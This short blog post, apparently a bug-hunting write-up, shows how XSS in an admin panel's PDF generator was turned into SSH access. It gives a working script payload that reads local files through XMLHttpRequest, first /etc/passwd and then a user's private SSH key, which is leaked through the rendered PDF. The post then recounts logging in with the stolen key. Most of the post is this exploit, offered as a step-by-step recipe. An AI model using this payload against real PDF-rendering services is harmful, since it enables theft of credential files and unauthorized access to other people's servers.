Sign in Subscribe
1 min read xss

XSS Attack To SSH

Admin Panel infected with XSS and uploading any file converted to pdf.

Submit the below Js code 
<script> 
x=new XMLHttpRequest; 
x.onload=function()
{ document.write(this.responseText) };
 x.open("GET","file:///etc/passwd"); x.send();
</script>

P0c

Next Download the pdf :

Download the Generated PDF from Admin Panel

was able to read and load /etc/passwd, lets try to read something more interesting 

/home/user/.ssh/rsa_id

result in :

rsa_id Loaded

Making local id_rsa and chmod it 700.. was able to gain ssh access

SSH Active Connection

Inspired from :

Local File Read via XSS in Dynamically Generated PDF
REDIRECTING TO THE NEW BLOG ... Hello Hunters, This time I am writing about a Vulnerability found in another…
BloggerRahul Maini

Published by:

1337

You might also like...

Jun
17

Configure SSH Google Two factor (2FA) Authentication on CentOS / RHEL

1 min read
Jun
17

router Apk and get ssh access over host

1 min read
Jun
17

Server Sends Email Alert on Root Login

1 min read